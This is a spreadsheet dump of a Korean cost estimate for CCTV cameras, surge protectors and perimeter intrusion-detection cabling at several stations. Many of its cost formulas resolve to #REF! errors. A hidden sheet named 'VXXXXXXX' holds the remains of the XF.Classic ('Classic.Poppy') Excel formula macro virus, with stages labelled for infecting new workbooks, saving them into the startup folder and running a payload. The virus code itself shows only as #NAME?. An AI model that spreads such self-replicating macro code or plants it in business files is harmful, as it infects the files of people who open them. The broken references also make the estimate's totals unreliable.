B19: 전원분배장치 | C19: AC 220V, 8ch 이상, 통신포트내장, 19" RACK TYPE | D19: EA | E19: 1 | F19: 1200000 | G19: =E19*F19 -> 1200000 | L19: =#REF! -> #REF! | M19: =E19*L19 -> #REF!
B20: SURGE 보호기 | C20: 전원용 | D20: EA | E20: 3 | F20: 600000 | G20: =E20*F20 -> 1800000 | L20: =#REF! -> #REF! | M20: =E20*L20 -> #REF!
B21: SURGE 보호기 | C21: 통신, 데이터, 영상용 | D21: EA | E21: 4 | F21: 150000 | G21: =E21*F21 -> 600000 | L21: =#REF! -> #REF! | M21: =E21*L21 -> #REF!
B22: 다기능송수신장치 | C22: 알람 및 음성 | D22: EA | E22: 0 | F22: 0 | G22: =E22*F22 -> 0 | L22: 0 | M22: =E22*L22 -> 0
B23: (합 계) | G23: =SUM(G7:G22) -> 49940000 | J23: =(#REF!+#REF!+#REF!+#REF!)*(G23/#REF!) -> #REF! | K23: =SUM(G23:J23) -> #REF! | M23: =SUM(M7:M22) -> #REF! | P23: =(#REF!+#REF!+#REF!+#REF!)*(M23/#REF!) -> #REF! | Q23: =SUM(M23:P23) -> #REF!
B25: [제 2호] 원격감지노드
B26: 원격감지노드 | C26: 영상처리장치 연동 | D26: EA | E26: 3 | F26: 1200000 | G26: =E26*F26 -> 3600000 | H26: =J27/3 -> #REF! | I26: =SUM(F26,H26) -> #REF! | K26: =I26*E26 -> #REF! | L26: =#REF! -> #REF! | M26: =E26*L26 -> #REF! | N26: =P27/3 -> #REF! | O26: =SUM(L26,N26) -> #REF! | Q26: =O26*E26 -> #REF!
B27: (합 계) | G27: =SUM(G26) -> 3600000 | J27: =(#REF!+#REF!+#REF!+#REF!)*(G27/#REF!) -> #REF! | K27: =SUM(G27:J27) -> #REF! | M27: =SUM(M26) -> #REF! | P27: =(#REF!+#REF!+#REF!+#REF!)*(M27/#REF!) -> #REF! | Q27: =SUM(M27:P27) -> #REF!
B29: [제 3호] 시운전
B30: 시운전 | D30: M/D | E30: 3 | F30: 0 | G30: =E30*F30 -> 0 | L30: =#REF! -> #REF! | M30: =E30*L30 -> #REF! | N30: =P31/3 -> #REF! | O30: =SUM(L30,N30) -> #REF!
B31: (합 계) | G31: =SUM(G30) -> 0 | M31: =SUM(M30) -> #REF! | P31: =(#REF!+#REF!+#REF!+#REF!)*(M31/#REF!) -> #REF! | Q31: =SUM(M31:P31) -> #REF!
B33: ( 소 계 ) | G33: =SUM(G23,G27,G31) -> 53540000 | M33: =SUM(M23,M27,M31) -> #REF!
A34: 청양VS | B34: [제 1호] 영상처리장치(기타설비 포함)
B35: IP Speed Dome 카메라 | C35: PTZ, 실외형, TTA 인증제품 | D35: EA | E35: 3 | F35: 5700000 | G35: =E35*F35 -> 17100000 | L35: =#REF! -> #REF! | M35: =E35*L35 -> #REF!
B36: IP Speed Dome 카메라 | C36: SPEED DOME, 실내형, TTA 인증제품 | D36: EA | E36: 2 | F36: 3600000 | G36: =E36*F36 -> 7200000 | L36: =#REF! -> #REF! | M36: =E36*L36 -> #REF!
B37: IP Bullet 카메라 | C37: Bullet, 고정형, PANEL용 | D37: EA | E37: 0 | F37: 0 | G37: =E37*F37 -> 0 | L37: =#REF! -> #REF! | M37: =E37*L37 -> #REF!
B38: 네트워크 스피커 | C38: HORN TYPE, 30W 이하 | D38: EA | E38: 1 | F38: 1200000 | G38: =E38*F38 -> 1200000 | L38: =#REF! -> #REF! | M38: =E38*L38 -> #REF!
B39: 오디오 앰프 | C39: 네트워크용 | D39: EA | E39: 0 | F39: 0 | G39: =E39*F39 -> 0 | L39: =#REF! -> #REF! | M39: =E39*L39 -> #REF!
B40: 영상처리장치 | C40: HDD 18TB 이상 | D40: EA | E40: 1 | F40: 18000000 | G40: =E40*F40 -> 18000000 | L40: =#REF! -> #REF! | M40: =E40*L40 -> #REF!
B41: 인터폰 | C41: 양방향 통화기능 | D41: EA | E41: 1 | F41: 2800000 | G41: =E41*F41 -> 2800000 | L41: =#REF! -> #REF! | M41: =E41*L41 -> #REF!
B42: DOOR LOCK | C42: 정문개폐기용 | D42: EA | E42: 1 | F42: 300000 | G42: =E42*F42 -> 300000 | L42: =#REF! -> #REF! | M42: =E42*L42 -> #REF!
B43: 카메라용 함체 | C43: W550ⅹH450ⅹD200, SUS 304 1.2T | D43: EA | E43: 3 | F43: 870000 | G43: =E43*F43 -> 2610000 | L43: =#REF! -> #REF! | M43: =E43*L43 -> #REF!
B44: CCTV 폴대 | C44: 6M Pole(SUS 304), CCTV용(가드포함) | D44: EA | E44: 3 | F44: 2300000 | G44: =E44*F44 -> 6900000 | L44: =#REF! -> #REF! | M44: =E44*L44 -> #REF!
...

Sheet 관리소별 세부산출내역서-충청
A1: 관리소별 세부산출 내역서
K2: (단위 : 원, VAT별도)
A3: 구분 | B3: 품 목 | C3: 규 격 | D3: 단위 | E3: 수량 | F3: 재료비 견적가 | H3: 노무비 설계가 | J3: 간접비 포함 | K3: 비고
F4: 단가 | G4: 금액 | H4: 단가 | I4: 금액
A5: 전동VS | B5: [제 1호] 영상처리장치(기타설비 포함)
B6: =#REF! -> #REF! | C6: =#REF! -> #REF! | D6: =#REF! -> #REF! | E6: 2 | F6: 3100000 | G6: =IF(E6*F6<>0, TRUNC(E6*F6, 1), "") -> 6200000
B7: =#REF! -> #REF! | C7: =#REF! -> #REF! | D7: =#REF! -> #REF! | E7: 1 | F7: 3100000 | G7: =IF(E7*F7<>0, TRUNC(E7*F7, 1), "") -> 3100000
B8: =#REF! -> #REF! | C8: =#REF! -> #REF! | D8: =#REF! -> #REF! | E8: 1 | F8: 7500000 | G8: =IF(E8*F8<>0, TRUNC(E8*F8, 1), "") -> 7500000
B9: =#REF! -> #REF! | C9: =#REF! -> #REF! | D9: =#REF! -> #REF! | E9: 1 | F9: 1200000 | G9: =IF(E9*F9<>0, TRUNC(E9*F9, 1), "") -> 1200000
B10: =#REF! -> #REF! | C10: =#REF! -> #REF! | D10: =#REF! -> #REF! | E10: 1 | F10: 32500000 | G10: =IF(E10*F10<>0, TRUNC(E10*F10, 1), "") -> 32500000 | K10: Monitor(KOGAS 지급품)
B11: =#REF! -> #REF! | C11: =#REF! -> #REF! | D11: =#REF! -> #REF! | E11: 1 | F11: 1300000 | G11: =IF(E11*F11<>0, TRUNC(E11*F11, 1), "") -> 1300000
B12: =#REF! -> #REF! | C12: =#REF! -> #REF! | D12: =#REF! -> #REF! | E12: 1 | F12: 200000 | G12: =IF(E12*F12<>0, TRUNC(E12*F12, 1), "") -> 200000
B13: =#REF! -> #REF! | C13: =#REF! -> #REF! | D13: =#REF! -> #REF! | E13: 2 | F13: 1200000 | G13: =IF(E13*F13<>0, TRUNC(E13*F13, 1), "") -> 2400000
B14: =#REF! -> #REF! | C14: =#REF! -> #REF! | D14: =#REF! -> #REF! | E14: 2 | F14: 1600000 | G14: =IF(E14*F14<>0, TRUNC(E14*F14, 1), "") -> 3200000
B15: =#REF! -> #REF! | C15: =#REF! -> #REF! | D15: =#REF! -> #REF! | E15: 1 | F15: 1600000 | G15: =IF(E15*F15<>0, TRUNC(E15*F15, 1), "") -> 1600000
B16: =#REF! -> #REF! | C16: =#REF! -> #REF! | D16: =#REF! -> #REF! | E16: 1 | F16: 1700000 | G16: =IF(E16*F16<>0, TRUNC(E16*F16, 1), "") -> 1700000
B17: =#REF! -> #REF! | C17: =#REF! -> #REF! | D17: =#REF! -> #REF! | E17: 1 | F17: 700000 | G17: =IF(E17*F17<>0, TRUNC(E17*F17, 1), "") -> 700000
B18: =#REF! -> #REF! | C18: =#REF! -> #REF! | D18: =#REF! -> #REF! | E18: 5 | F18: 150000 | G18: =IF(E18*F18<>0, TRUNC(E18*F18, 1), "") -> 750000
B19: =#REF! -> #REF! | C19: =#REF! -> #REF! | D19: =#REF! -> #REF! | E19: 4 | F19: 150000 | G19: =IF(E19*F19<>0, TRUNC(E19*F19, 1), "") -> 600000
B20: ( 합 계 ) | G20: =SUM(G6:G19) -> 62950000 | J20: =INT((G20+I20)*1.2/1000)*1000 -> 75540000
B22: [제 2호] 설치(영상처리장치)
B23: =#REF! -> #REF! | C23: =#REF! -> #REF! | D23: =#REF! -> #REF! | E23: =E6 -> 2 | H23: =#REF! -> #REF! | I23: =E23*H23 -> #REF!
B24: =#REF! -> #REF! | C24: =#REF! -> #REF! | D24: =#REF! -> #REF! | E24: =E7 -> 1 | H24: =#REF! -> #REF! | I24: =E24*H24 -> #REF!
B25: =#REF! -> #REF! | C25: =#REF! -> #REF! | D25: =#REF! -> #REF! | E25: =E8 -> 1 | H25: =#REF! -> #REF! | I25: =E25*H25 -> #REF!
B26: =#REF! -> #REF! | C26: =#REF! -> #REF! | D26: =#REF! -> #REF! | E26: =E9 -> 1 | H26: =#REF! -> #REF! | I26: =E26*H26 -> #REF!
B27: =#REF! -> #REF! | C27: =#REF! -> #REF! | D27: =#REF! -> #REF! | E27: =E10 -> 1 | H27: =#REF! -> #REF! | I27: =E27*H27 -> #REF!
B28: =#REF! -> #REF! | C28: =#REF! -> #REF! | D28: =#REF! -> #REF! | E28: =E11 -> 1 | H28: =#REF! -> #REF! | I28: =E28*H28 -> #REF!
B29: =#REF! -> #REF! | C29: =#REF! -> #REF! | D29: =#REF! -> #REF! | E29: =E12 -> 1 | H29: =#REF! -> #REF! | I29: =E29*H29 -> #REF!
B30: =#REF! -> #REF! | C30: =#REF! -> #REF! | D30: =#REF! -> #REF! | E30: =E13 -> 2 | H30: =#REF! -> #REF! | I30: =E30*H30 -> #REF!
B31: =#REF! -> #REF! | C31: =#REF! -> #REF! | D31: =#REF! -> #REF! | E31: =E14 -> 2 | H31: =#REF! -> #REF! | I31: =E31*H31 -> #REF!
B32: =#REF! -> #REF! | C32: =#REF! -> #REF! | D32: =#REF! -> #REF! | E32: =E15 -> 1 | H32: =#REF! -> #REF! | I32: =E32*H32 -> #REF!
B33: =#REF! -> #REF! | C33: =#REF! -> #REF! | D33: =#REF! -> #REF! | E33: =E16 -> 1 | H33: =#REF! -> #REF! | I33: =E33*H33 -> #REF!
B34: =#REF! -> #REF! | C34: =#REF! -> #REF! | D34: =#REF! -> #REF! | E34: =E17 -> 1 | H34: =#REF! -> #REF! | I34: =E34*H34 -> #REF!
... B36: =#REF! -> #REF! | C36: =#REF! -> #REF! | D36: =#REF! -> #REF! | E36: =E19 -> 4 | H36: =#REF! -> #REF! | I36: =E36*H36 -> #REF!
B37: ( 합 계 ) | I37: =SUM(I23:I36) -> #REF! | J37: =INT((G37+I37)*1.2/1000)*1000 -> #REF!
B39: [제 3호] 원격감지노드
B40: =#REF! -> #REF! | C40: =#REF! -> #REF! | D40: =#REF! -> #REF! | E40: 5 | F40: 800000 | G40: =IF(E40*F40<>0, TRUNC(E40*F40, 1), "") -> 4000000 | J40: =INT((F40*1.2)/1000+(H40*1.2)/1000)*1000 -> 960000
B41: ( 합 계 ) | G41: =SUM(G40) -> 4000000 | J41: =E40*J40 -> 4800000
B43: [제 4호] 설치(원격감지노드)
B44: =#REF! -> #REF! | C44: =#REF! -> #REF! | D44: =#REF! -> #REF! | E44: =E40 -> 5 | H44: =#REF! -> #REF! | I44: =E44*H44 -> #REF! | J44: =INT((F44*1.2)/1000+(H44*1.2)/1000)*1000 -> #REF!
...

Sheet 6.외곽침입자 감지설비 내부집계
A1: 6. 외곽 침입자 감지설비 내부팬스
C2: 단위 | D2: 수 량 | E2: 할 증 (%) | F2: 합 계 | J2: 비 고
A3: 품 명 | B3: 규 격
A5: HI-VE 전선관 | B5: 16C | C5: M | D5: ='6.외곽침입자 감지설비 내부산출'!U21 -> 0 | E5: 0.05 | F5: =ROUNDUP(D5+(D5*E5),0) -> 0
A6: HI-VE 전선관 | B6: 22C | C6: M | D6: ='6.외곽침입자 감지설비 내부산출'!V21 -> 0 | E6: 0.05 | F6: =ROUNDUP(D6+(D6*E6),0) -> 0
A7: 0.6/1KV F-CVVSB CABLE | B7: 2.5SQ x 12C | C7: M | D7: ='6.외곽침입자 감지설비 내부산출'!Y21 -> 0 | E7: 0.03 | F7: =ROUNDUP(D7+(D7*E7),0) -> 0
A8: STP CABLE | B8: CAT.5e 4P-0.5mm | C8: M | D8: ='6.외곽침입자 감지설비 내부산출'!Z21 -> 0 | E8: 0.03 | F8: =ROUNDUP(D8+(D8*E8),0) -> 0
F537: =#REF! -> #REF! | O537: =#REF! -> #REF!
F621: =#REF! -> #REF! | O621: =#REF! -> #REF!
F646: =#REF! -> #REF! | O646: =#REF! -> #REF!

Sheet 6.외곽침입자 감지설비 내부산출
C1: FLE | D1: FLE | F1: 6. 외곽 침입자 감지설비 (내부팬스)
A2: 가 | B2: FLE | C2: XIB | D2: XIB | E2: 합 | F2: FROM | G2: TO | H2: CONDUIT and CABLE | L2: 산출근거 | T2: TOTAL | U2: HI-VE | X2: 케이블
A3: 닥 | B3: XIB | C3: LE용 | D3: LE | T3: SUM | U3: 16C | V3: 22C | W3: 28C | X3: HDMI | Y3: F-CVVSB | Z3: STP 4P
A4: 수 | B4: LE | C4: 전선 | D4: 길 | E4: 계 | U4: (매입) | V4: (매입) | W4: (매입) | X4: CABLE | Y4: 12C/2.5㎟ | Z4: CAT.5e
B5: 개소 | C5: (m) | D5: 이 | T5: (M) | U5: (M) | V5: (M) | W5: (M) | X5: (M) | Y5: (M) | Z5: (M)
F6: P9-1-1-E-E03-01-0013 < 외곽 침입자 감지설비 (내부팬스) >
A7: 1 | E7: =T7*A7 -> 419 | F7: 정문경비동 | G7: 레이저스캔 | H7: CVV2.5SQ x 12C | K7: (22C) | L7: =32+12+26+31+20+33 -> 154 | M7: =18+14+60+23+18 -> 133 | N7: =6+17+35+10+19+15 -> 102 | O7: 30 | T7: =SUM(L7:S7) -> 419
A8: 1 | E8: =T8*A8 -> 419 | H8: STP (CAT.5e) 4P/0.5mm x 1 | K8: (16C) | L8: =32+12+26+31+20+33 -> 154 | M8: =18+14+60+23+18 -> 133 | N8: =6+17+35+10+19+15 -> 102 | O8: 30 | T8: =SUM(L8:S8) -> 419
E9: =T9*A9 -> 0 | T9: =SUM(L9:S9) -> 0 | U9: =T9 -> 0 | Z9: =E9 -> 0
L21: 합 계 | U21: =SUM(U6:U20) -> 0 | V21: =SUM(V6:V20) -> 0 | W21: =SUM(W6:W20) -> 0 | X21: =SUM(X6:X20) -> 0 | Y21: =SUM(Y6:Y20) -> 0 | Z21: =SUM(Z6:Z20) -> 0
L22: 전선관 할증 10% | U22: 0.05 | V22: 0.05 | W22: 0.05
L23: 옥내전선 할증 10%
L24: 옥내케이블 할증 5% | X24: 0.03 | Y24: 0.03 | Z24: 0.03
L25: 할 증 계 | U25: =ROUNDUP(U21+(U21*(U22+U23+U24)),0) -> 0 | V25: =ROUNDUP(V21+(V21*(V22+V23+V24)),0) -> 0 | W25: =ROUNDUP(W21+(W21*(W22+W23+W24)),0) -> 0 | X25: =ROUNDUP(X21+(X21*(X22+X23+X24)),0) -> 0 | Y25: =ROUNDUP(Y21+(Y21*(Y22+Y23+Y24)),0) -> 0 | Z25: =ROUNDUP(Z21+(Z21*(Z22+Z23+Z24)),0) -> 0
F522: =#REF! -> #REF! | O522: =#REF! -> #REF!
F606: =#REF! -> #REF! | O606: =#REF! -> #REF!
F631: =#REF! -> #REF! | O631: =#REF! -> #REF!

Sheet VXXXXXXX
A1: 6변전소 설계서-P0.xls | C1: FALSE
A2: Book1
A3: C:\Program Files\Microsoft Office\Office10\xlstart\Book1. | C3: **Auto and On Sheet Starts Here**
A4: 3 | C4: FALSE
C5: #NAME?
C6: =#N/A -> #N/A
A7: Classic.Poppy by VicodinES | C7: #NAME?
A8: With Lord Natas | C8: #NAME?
A9: An Excel Formula Macro Virus (XF.Classic) | C9: #NAME?
A10: Hydrocodone/APAP 10-650 For Your Computer | C10: FALSE
A11: (C) The Narkotic Network 1998 | C11: FALSE
C12: FALSE
C13: FALSE
A14: **Simple Payload** | C14: #NAME?
A15: FALSE
A16: FALSE
A17: #NAME? | C17: **Set Our Values and Paths**
C18: #NAME?
C19: #NAME?
A20: **Add New Workbook, Infect It, Save It As Book1.xls** | C20: #NAME?
A21: #NAME? | C21: #NAME?
A22: #NAME? | C22: #NAME?
A23: =#N/A -> #N/A | C23: #NAME?
A24: #NAME?
A25: #NAME?
A26: FALSE | C26: **Infect Workbook**
A27: FALSE | C27: FALSE
A28: FALSE | C28: #NAME?
A29: FALSE | C29: =#N/A -> #N/A
A30: FALSE | C30: #NAME?
A31: FALSE | C31: #NAME?
A32: FALSE | C32: FALSE
A33: FALSE | C33: FALSE
A34: FALSE | C34: FALSE
A35: FALSE | C35: #NAME?
A36: FALSE | C36: #NAME?
A37: FALSE
A38: FALSE
A39: FALSE | C39: #NAME?
A40: FALSE | C40: FALSE
...

Sheet 제비율표
